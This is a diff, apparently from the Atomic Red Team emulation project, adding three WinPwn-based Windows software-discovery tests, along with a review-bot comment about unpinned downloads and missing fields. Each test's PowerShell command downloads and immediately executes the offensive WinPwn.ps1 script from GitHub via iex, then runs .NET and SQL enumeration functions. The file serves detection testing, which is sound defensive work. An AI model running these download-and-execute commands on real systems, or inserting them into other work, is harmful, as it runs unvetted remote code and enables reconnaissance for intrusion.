diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 3a31b727..536f5f8f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -969,6 +969,9 @@ discovery,T1518.001,Security Software Discovery,6,Security Software Discovery -
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
+discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
+discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
+discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 21570647..c7736822 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -675,6 +675,9 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery -
discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
+discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
+discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
+discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 0bd00f6f..440a7ccf 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1503,6 +1503,9 @@
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- Atomic Test #3: Find and Display Safari Browser Version [macos]
+ - Atomic Test #4: WinPwn - Dotnetsearch [windows]
+ - Atomic Test #5: WinPwn - DotNet [windows]
+ - Atomic Test #6: WinPwn - powerSQL [windows]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 6d0b5c4d..09398503 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1086,6 +1086,9 @@
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
+ - Atomic Test #4: WinPwn - Dotnetsearch [windows]
+ - Atomic Test #5: WinPwn - DotNet [windows]
+ - Atomic Test #6: WinPwn - powerSQL [windows]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index ea2da349..e8192279 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -61901,9 +61901,44 @@ discovery:
executor:
name: sh
elevation_required: false
- command: |-
+ command: |
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
+ - name: WinPwn - Dotnetsearch
+ auto_generated_guid: 7e79a1b6-519e-433c-ad55-3ff293667101
+ description: Search for any .NET binary file in a share using the Dotnetsearch
+ function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ Dotnetsearch -noninteractive -consoleoutput
+ name: powershell
+ - name: WinPwn - DotNet
+ auto_generated_guid: 10ba02d0-ab76-4f80-940d-451633f24c5b
+ description: Search for .NET Service-Binaries on this system via winpwn dotnet
+ function of WinPwn.
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ dotnet -consoleoutput -noninteractive
+ name: powershell
+ - name: WinPwn - powerSQL
+ auto_generated_guid: 0bb64470-582a-4155-bde2-d6003a95ed34
+ description: Start PowerUpSQL Checks using powerSQL function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ powerSQL -noninteractive -consoleoutput
+ name: powershell
T1497.001:
technique:
type: attack-pattern
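Review bot: The three added WinPwn tests pin `WinPwn.ps1` to commit 121dcee26a7aca368821563cbe92b2b5638c5773 but also set `$S3cur3Th1sSh1t_repo` to the unpinned account root. If WinPwn uses that variable to fetch the modules behind `Dotnetsearch`, `dotnet` and `powerSQL` (not visible in this hunk), those follow-on downloads are outside the pin and the code run on the test host can change without any change to this file. None of the three executors declares `elevation_required`, unlike the Safari test just above; add `elevation_required: false` (or `true` if the checks need it), plus a `cleanup_command` if the functions leave output behind. Each `description` should also state that the test needs outbound access to raw.githubusercontent.com and produces script-download and `iex` telemetry beyond T1518, so detections are not misattributed to software discovery. If index.yaml is generated, make these changes in the source atomic definition rather than here.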
diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md
index 796e4ffc..7cf1c0d1 100644
--- a/atomics/T1518/T1518.md
+++ b/atomics/T1518/T1518.md
@@ -12,6 +12,12 @@ Adversaries may attempt to enumerate software for a variety of reasons, such as
- [Atomic Test #3 - Find and Display Safari Browser Version](#atomic-test-3---find-and-display-safari-browser-version)
+- [Atomic Test #4 - WinPwn - Dotnetsearch](#atomic-test-4---winpwn---dotnetsearch)
+
+- [Atomic Test #5 - WinPwn - DotNet](#atomic-test-5---winpwn---dotnet)
+
+- [Atomic Test #6 - WinPwn - powerSQL](#atomic-test-6---winpwn---powersql)
+
@@ -100,4 +106,94 @@ Adversaries may attempt to get a listing of non-security related software that i
+
+
+
+## Atomic Test #4 - WinPwn - Dotnetsearch
+Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7e79a1b6-519e-433c-ad55-3ff293667101
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+Dotnetsearch -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #5 - WinPwn - DotNet
+Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 10ba02d0-ab76-4f80-940d-451633f24c5b
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+dotnet -consoleoutput -noninteractive
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #6 - WinPwn - powerSQL
+Start PowerUpSQL Checks using powerSQL function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0bb64470-582a-4155-bde2-d6003a95ed34
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+powerSQL -noninteractive -consoleoutput
+```
+
+
+
+
+
+